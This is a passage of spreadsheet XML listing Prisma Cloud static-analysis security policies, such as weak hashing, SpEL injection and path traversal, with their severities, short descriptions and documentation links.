      </c>
      <c r="AG3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7" t="inlineStr">
        <is>
          <t>a0a45daf-ca9f-4c74-82f2-491e5781c68d</t>
        </is>
      </c>
      <c r="AI327" t="inlineStr"/>
      <c r="AJ327" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK327" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" t="inlineStr"/>
      <c r="B328" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C328" s="2" t="inlineStr"/>
      <c r="D328" t="inlineStr"/>
      <c r="E328" t="inlineStr"/>
      <c r="F328" t="inlineStr"/>
      <c r="G328" t="b">
        <v>1</v>
      </c>
      <c r="H3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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J328" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K328" t="inlineStr">
        <is>
          <t>Inadequate encryption strength with Hazelcast library</t>
        </is>
      </c>
      <c r="L328" t="inlineStr"/>
      <c r="M328" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N328" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O328" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P328" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q328" t="inlineStr"/>
      <c r="R328" t="inlineStr"/>
      <c r="S328" t="inlineStr"/>
      <c r="T328" t="b">
        <v>0</v>
      </c>
      <c r="U328" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V328" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W328" t="inlineStr">
        <is>
          <t>The network communications for Hazelcast is configured to use a deprecated symmetric cipher. Consider using TLS/SSL when establishing communications across the Hazelcast cluster.</t>
        </is>
      </c>
      <c r="X328" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-132</t>
        </is>
      </c>
      <c r="Y328" t="inlineStr"/>
      <c r="Z328" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA328" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB328" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC328" t="inlineStr">
        <is>
          <t>CKV3_SAST_132</t>
        </is>
      </c>
      <c r="AD328" t="b">
        <v>1</v>
      </c>
      <c r="AE328" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF328" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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8" t="inlineStr">
        <is>
          <t>b9e3a78b-f81c-40c2-99c8-6e26d6568af2</t>
        </is>
      </c>
      <c r="AI328" t="inlineStr"/>
      <c r="AJ328" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK328" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" t="inlineStr"/>
      <c r="B329" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C329" s="2" t="inlineStr"/>
      <c r="D329" t="inlineStr"/>
      <c r="E329" t="inlineStr"/>
      <c r="F329" t="inlineStr"/>
      <c r="G329" t="b">
        <v>1</v>
      </c>
      <c r="H3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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J329" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K329" t="inlineStr">
        <is>
          <t>Usage of insecure SHA1 hashing algorithm</t>
        </is>
      </c>
      <c r="L329" t="inlineStr"/>
      <c r="M329" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N329" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O329" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P329" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q329" t="inlineStr"/>
      <c r="R329" t="inlineStr"/>
      <c r="S329" t="inlineStr"/>
      <c r="T329" t="b">
        <v>0</v>
      </c>
      <c r="U329" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V329" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W329" t="inlineStr">
        <is>
          <t>This policy identifies the use of the outdated SHA1 hash function from the crypto/sha1 package in Go applications. SHA1 is considered insecure and should be replaced with more secure hash functions, such as SHA256.</t>
        </is>
      </c>
      <c r="X329" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-242</t>
        </is>
      </c>
      <c r="Y329" t="inlineStr"/>
      <c r="Z329" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA329" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB329" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC329" t="inlineStr">
        <is>
          <t>CKV3_SAST_242</t>
        </is>
      </c>
      <c r="AD329" t="b">
        <v>1</v>
      </c>
      <c r="AE329" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF329" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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9" t="inlineStr">
        <is>
          <t>cb907f0c-ff13-409a-9f67-102ea52f0783</t>
        </is>
      </c>
      <c r="AI329" t="inlineStr"/>
      <c r="AJ329" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK329" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" t="inlineStr"/>
      <c r="B330" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C330" s="2" t="inlineStr"/>
      <c r="D330" t="inlineStr"/>
      <c r="E330" t="inlineStr"/>
      <c r="F330" t="inlineStr"/>
      <c r="G330" t="b">
        <v>1</v>
      </c>
      <c r="H3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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J330" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K330" t="inlineStr">
        <is>
          <t>chmod sets a permissive mask on file</t>
        </is>
      </c>
      <c r="L330" t="inlineStr"/>
      <c r="M330" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N330" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O330" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P330" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q330" t="inlineStr"/>
      <c r="R330" t="inlineStr"/>
      <c r="S330" t="inlineStr"/>
      <c r="T330" t="b">
        <v>0</v>
      </c>
      <c r="U330" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V330" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W330" t="inlineStr">
        <is>
          <t>Chmod setting a permissive mask on file.</t>
        </is>
      </c>
      <c r="X330" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-3</t>
        </is>
      </c>
      <c r="Y330" t="inlineStr"/>
      <c r="Z330" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA330" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB330" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC330" t="inlineStr">
        <is>
          <t>CKV3_SAST_3</t>
        </is>
      </c>
      <c r="AD330" t="b">
        <v>1</v>
      </c>
      <c r="AE330" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF330" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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0" t="inlineStr">
        <is>
          <t>bf99eb7d-9c0b-403f-b0e3-5457ff6115fa</t>
        </is>
      </c>
      <c r="AI330" t="inlineStr"/>
      <c r="AJ330" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK330" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" t="inlineStr"/>
      <c r="B331" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C331" s="2" t="inlineStr"/>
      <c r="D331" t="inlineStr"/>
      <c r="E331" t="inlineStr"/>
      <c r="F331" t="inlineStr"/>
      <c r="G331" t="b">
        <v>1</v>
      </c>
      <c r="H3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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J331" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K331" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an expression language statement ('Expression Language Injection')</t>
        </is>
      </c>
      <c r="L331" t="inlineStr"/>
      <c r="M331" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N331" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O331" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P331" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q331" t="inlineStr"/>
      <c r="R331" t="inlineStr"/>
      <c r="S331" t="inlineStr"/>
      <c r="T331" t="b">
        <v>0</v>
      </c>
      <c r="U331" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V331" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W331" t="inlineStr">
        <is>
          <t>The application was found calling SpringFramework's `SpelExpressionParser.parseExpression`. Calling this method directly with user-supplied input may allow an adversary to execute arbitrary Java code including OS system commands. Never call `parseExpression` or `parseRaw` directly with user-supplied input.</t>
        </is>
      </c>
      <c r="X331" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-122</t>
        </is>
      </c>
      <c r="Y331" t="inlineStr"/>
      <c r="Z331" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA331" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB331" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC331" t="inlineStr">
        <is>
          <t>CKV3_SAST_122</t>
        </is>
      </c>
      <c r="AD331" t="b">
        <v>1</v>
      </c>
      <c r="AE331" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF331" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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1" t="inlineStr">
        <is>
          <t>cf734278-da5b-43fc-be38-ab0487b47ede</t>
        </is>
      </c>
      <c r="AI331" t="inlineStr"/>
      <c r="AJ331" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK331" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" t="inlineStr"/>
      <c r="B332" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C332" s="2" t="inlineStr"/>
      <c r="D332" t="inlineStr"/>
      <c r="E332" t="inlineStr"/>
      <c r="F332" t="inlineStr"/>
      <c r="G332" t="b">
        <v>1</v>
      </c>
      <c r="H3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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J332" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K332" t="inlineStr">
        <is>
          <t>Improper neutralization of user input in query logic</t>
        </is>
      </c>
      <c r="L332" t="inlineStr"/>
      <c r="M332" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N332" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O332" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P332" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q332" t="inlineStr"/>
      <c r="R332" t="inlineStr"/>
      <c r="S332" t="inlineStr"/>
      <c r="T332" t="b">
        <v>0</v>
      </c>
      <c r="U332" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V332" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W332" t="inlineStr">
        <is>
          <t>Constructing SimpleDB queries containing user input can allow an attacker to view unauthorized records.</t>
        </is>
      </c>
      <c r="X332" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-165</t>
        </is>
      </c>
      <c r="Y332" t="inlineStr"/>
      <c r="Z332" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA332" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB332" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC332" t="inlineStr">
        <is>
          <t>CKV3_SAST_165</t>
        </is>
      </c>
      <c r="AD332" t="b">
        <v>1</v>
      </c>
      <c r="AE332" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF332" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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2" t="inlineStr">
        <is>
          <t>c3ec8e21-2dba-4faa-9157-edacf91cf7af</t>
        </is>
      </c>
      <c r="AI332" t="inlineStr"/>
      <c r="AJ332" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK332" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" t="inlineStr"/>
      <c r="B333" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C333" s="2" t="inlineStr"/>
      <c r="D333" t="inlineStr"/>
      <c r="E333" t="inlineStr"/>
      <c r="F333" t="inlineStr"/>
      <c r="G333" t="b">
        <v>1</v>
      </c>
      <c r="H3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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J333" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K333" t="inlineStr">
        <is>
          <t>Improper certification validation</t>
        </is>
      </c>
      <c r="L333" t="inlineStr"/>
      <c r="M333" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N333" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O333" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P333" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q333" t="inlineStr"/>
      <c r="R333" t="inlineStr"/>
      <c r="S333" t="inlineStr"/>
      <c r="T333" t="b">
        <v>0</v>
      </c>
      <c r="U333" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V333" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W333" t="inlineStr">
        <is>
          <t>The product does not validate, or incorrectly validates, a certificate.</t>
        </is>
      </c>
      <c r="X333" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-180</t>
        </is>
      </c>
      <c r="Y333" t="inlineStr"/>
      <c r="Z333" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA333" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB333" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC333" t="inlineStr">
        <is>
          <t>CKV3_SAST_180</t>
        </is>
      </c>
      <c r="AD333" t="b">
        <v>1</v>
      </c>
      <c r="AE333" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF333" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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3" t="inlineStr">
        <is>
          <t>24f848a3-47f4-45b0-9647-5611067d53bf</t>
        </is>
      </c>
      <c r="AI333" t="inlineStr"/>
      <c r="AJ333" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK333" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" t="inlineStr"/>
      <c r="B334" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C334" s="2" t="inlineStr"/>
      <c r="D334" t="inlineStr"/>
      <c r="E334" t="inlineStr"/>
      <c r="F334" t="inlineStr"/>
      <c r="G334" t="b">
        <v>1</v>
      </c>
      <c r="H3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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J334" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K334" t="inlineStr">
        <is>
          <t>Insecure exception logging with output streams</t>
        </is>
      </c>
      <c r="L334" t="inlineStr"/>
      <c r="M334" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N334" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O334" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P334" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q334" t="inlineStr"/>
      <c r="R334" t="inlineStr"/>
      <c r="S334" t="inlineStr"/>
      <c r="T334" t="b">
        <v>0</v>
      </c>
      <c r="U334" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V334" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W334" t="inlineStr">
        <is>
          <t>The application was found printing stack information to the default system output. As stack trace data may contain sensitive information, it is recommended that the output be logged using a secure logging framework. Log files should also be protected with proper operating system permission levels.</t>
        </is>
      </c>
      <c r="X334" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-138</t>
        </is>
      </c>
      <c r="Y334" t="inlineStr"/>
      <c r="Z334" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA334" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB334" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC334" t="inlineStr">
        <is>
          <t>CKV3_SAST_138</t>
        </is>
      </c>
      <c r="AD334" t="b">
        <v>1</v>
      </c>
      <c r="AE334" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF334" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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4" t="inlineStr">
        <is>
          <t>f4f4af75-6f8e-47cb-93fb-60dffff0b128</t>
        </is>
      </c>
      <c r="AI334" t="inlineStr"/>
      <c r="AJ334" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK334" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" t="inlineStr"/>
      <c r="B335" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C335" s="2" t="inlineStr"/>
      <c r="D335" t="inlineStr"/>
      <c r="E335" t="inlineStr"/>
      <c r="F335" t="inlineStr"/>
      <c r="G335" t="b">
        <v>1</v>
      </c>
      <c r="H3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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J335" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K335" t="inlineStr">
        <is>
          <t>Insecure use of weak hashing algorithms</t>
        </is>
      </c>
      <c r="L335" t="inlineStr"/>
      <c r="M335" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N335" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O335" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P335" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q335" t="inlineStr"/>
      <c r="R335" t="inlineStr"/>
      <c r="S335" t="inlineStr"/>
      <c r="T335" t="b">
        <v>0</v>
      </c>
      <c r="U335" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V335" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W335" t="inlineStr">
        <is>
          <t>Ensure that Hashing is not done with weak algorithm</t>
        </is>
      </c>
      <c r="X335" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-38</t>
        </is>
      </c>
      <c r="Y335" t="inlineStr"/>
      <c r="Z335" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA335" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB335" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC335" t="inlineStr">
        <is>
          <t>CKV3_SAST_38</t>
        </is>
      </c>
      <c r="AD335" t="b">
        <v>1</v>
      </c>
      <c r="AE335" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF335" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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5" t="inlineStr">
        <is>
          <t>c3153658-27bf-455a-aed7-8684bcf86d6b</t>
        </is>
      </c>
      <c r="AI335" t="inlineStr"/>
      <c r="AJ335" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK335" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" t="inlineStr"/>
      <c r="B336" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C336" s="2" t="inlineStr"/>
      <c r="D336" t="inlineStr"/>
      <c r="E336" t="inlineStr"/>
      <c r="F336" t="inlineStr"/>
      <c r="G336" t="b">
        <v>1</v>
      </c>
      <c r="H3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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J336" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K336" t="inlineStr">
        <is>
          <t>Relative path traversal from input</t>
        </is>
      </c>
      <c r="L336" t="inlineStr"/>
      <c r="M336" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N336" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O336" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P336" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q336" t="inlineStr"/>
      <c r="R336" t="inlineStr"/>
      <c r="S336" t="inlineStr"/>
      <c r="T336" t="b">
        <v>0</v>
      </c>
      <c r="U336" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V336" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W336" t="inlineStr">
        <is>
          <t>The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as \"..\" that can resolve to a location that is outside of that directory. This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.</t>
        </is>
      </c>
      <c r="X336" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-174</t>
        </is>
      </c>
      <c r="Y336" t="inlineStr"/>
      <c r="Z336" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA336" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB336" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC336" t="inlineStr">
        <is>
          <t>CKV3_SAST_174</t>
        </is>
      </c>
      <c r="AD336" t="b">
        <v>1</v>
      </c>
      <c r="AE336" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF336" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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6" t="inlineStr">
        <is>
          <t>6f502a98-a990-4f76-95ac-43980b7f1390</t>
        </is>
      </c>
      <c r="AI336" t="inlineStr"/>
      <c r="AJ336" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK336" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" t="inlineStr"/>
      <c r="B337" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C337" s="2" t="inlineStr"/>
      <c r="D337" t="inlineStr"/>
      <c r="E337" t="inlineStr"/>
      <c r="F337" t="inlineStr"/>
      <c r="G337" t="b">
        <v>1</v>
      </c>
      <c r="H3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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J337" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K337" t="inlineStr">
        <is>
          <t>Calls to fs functions that take a non Literal value as the filename parameter</t>
        </is>
      </c>
      <c r="L337" t="inlineStr"/>
      <c r="M337" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N337" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O337" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P337" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q337" t="inlineStr"/>
      <c r="R337" t="inlineStr"/>
      <c r="S337" t="inlineStr"/>
      <c r="T337" t="b">
        <v>0</v>
      </c>
      <c r="U337" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V337" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W337" t="inlineStr">
        <is>
          <t>A variable is present in the filename argument of fs calls, this might allow an attacker to access anything on your system.</t>
        </is>
      </c>
      <c r="X337" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-29</t>
        </is>
      </c>
      <c r="Y337" t="inlineStr"/>
      <c r="Z337" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA337" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB337" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC337" t="inlineStr">
        <is>
          <t>CKV3_SAST_29</t>
        </is>
      </c>
      <c r="AD337" t="b">
        <v>1</v>
      </c>
      <c r="AE337" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF337" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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7" t="inlineStr">
        <is>
          <t>734c1eff-95ac-4a9e-9954-996365889bf1</t>
        </is>
      </c>
      <c r="AI337" t="inlineStr"/>
      <c r="AJ337" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK337" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" t="inlineStr"/>
      <c r="B338" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C338" s="2" t="inlineStr"/>
      <c r="D338" t="inlineStr"/>
      <c r="E338" t="inlineStr"/>
      <c r="F338" t="inlineStr"/>
      <c r="G338" t="b">
        <v>1</v>
      </c>
      <c r="H3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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J338" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K338" t="inlineStr">
        <is>
          <t>Sensitive information exposure in error messages</t>
        </is>
      </c>
      <c r="L338" t="inlineStr"/>
      <c r="M338" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N338" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O338" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P338" t="inlineStr">
        <is>
          <t>build</t>
        </is>
